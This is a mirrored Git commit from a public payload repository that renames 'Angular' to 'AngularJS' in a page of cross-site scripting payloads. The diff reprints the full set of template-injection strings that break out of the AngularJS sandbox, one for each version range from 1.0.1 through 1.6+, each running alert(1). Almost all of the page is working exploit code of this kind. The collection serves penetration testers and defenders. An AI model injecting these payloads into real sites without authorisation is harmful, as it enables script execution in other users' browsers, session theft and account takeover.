mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
clarify AngularJS vs Angular
This commit is contained in:
Kyle Martin
parent
6f4a28ef66
commit
e95b0c34a3
@ -1,20 +1,20 @@
|
||||
# XSS in Angular
|
||||
# XSS in Angular and AngularJS
|
||||
|
||||
## Client Side Template Injection
|
||||
|
||||
The following payloads are based on Client Side Template Injection.
|
||||
|
||||
### Stored/Reflected XSS - Simple alert
|
||||
### Stored/Reflected XSS - Simple alert in AngularJS
|
||||
|
||||
> Angular as of version 1.6 have removed the sandbox altogether
|
||||
> AngularJS as of version 1.6 have removed the sandbox altogether
|
||||
|
||||
Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
|
||||
AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
|
||||
|
||||
```javascript
|
||||
{{[].pop.constructor('alert\u00281\u0029')()}}
|
||||
@ -22,7 +22,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
|
||||
|
||||
Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
|
||||
|
||||
Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
|
||||
AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
|
||||
|
||||
```javascript
|
||||
{{0[a='constructor'][a]('alert(1)')()}}
|
||||
@ -30,7 +30,7 @@ Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/105588761
|
||||
{{$on.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
|
||||
AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
|
||||
|
||||
```javascript
|
||||
{{
|
||||
@ -49,25 +49,25 @@ Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.5.0 - 1.5.8
|
||||
AngularJS 1.5.0 - 1.5.8
|
||||
|
||||
```javascript
|
||||
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.4.0 - 1.4.9
|
||||
AngularJS 1.4.0 - 1.4.9
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
||||
```
|
||||
|
||||
Angular 1.3.20
|
||||
AngularJS 1.3.20
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.3.19
|
||||
AngularJS 1.3.19
|
||||
|
||||
```javascript
|
||||
{{
|
||||
@ -76,7 +76,7 @@ Angular 1.3.19
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.3 - 1.3.18
|
||||
AngularJS 1.3.3 - 1.3.18
|
||||
|
||||
```javascript
|
||||
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
@ -84,7 +84,7 @@ Angular 1.3.3 - 1.3.18
|
||||
$eval('x=alert(1)//'); }}
|
||||
```
|
||||
|
||||
Angular 1.3.1 - 1.3.2
|
||||
AngularJS 1.3.1 - 1.3.2
|
||||
|
||||
```javascript
|
||||
{{
|
||||
@ -94,7 +94,7 @@ Angular 1.3.1 - 1.3.2
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.0
|
||||
AngularJS 1.3.0
|
||||
|
||||
```javascript
|
||||
{{!ready && (ready = true) && (
|
||||
@ -113,37 +113,37 @@ Angular 1.3.0
|
||||
);}}
|
||||
```
|
||||
|
||||
Angular 1.2.24 - 1.2.29
|
||||
AngularJS 1.2.24 - 1.2.29
|
||||
|
||||
```javascript
|
||||
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.19 - 1.2.23
|
||||
AngularJS 1.2.19 - 1.2.23
|
||||
|
||||
```javascript
|
||||
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
|
||||
```
|
||||
|
||||
Angular 1.2.6 - 1.2.18
|
||||
AngularJS 1.2.6 - 1.2.18
|
||||
|
||||
```javascript
|
||||
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.2.2 - 1.2.5
|
||||
AngularJS 1.2.2 - 1.2.5
|
||||
|
||||
```javascript
|
||||
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.0 - 1.2.1
|
||||
AngularJS 1.2.0 - 1.2.1
|
||||
|
||||
```javascript
|
||||
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.0.1 - 1.1.5 and Vue JS
|
||||
AngularJS 1.0.1 - 1.1.5 and Vue JS
|
||||
|
||||
```javascript
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
|
||||
Loading…
Reference in New Issue
Block a user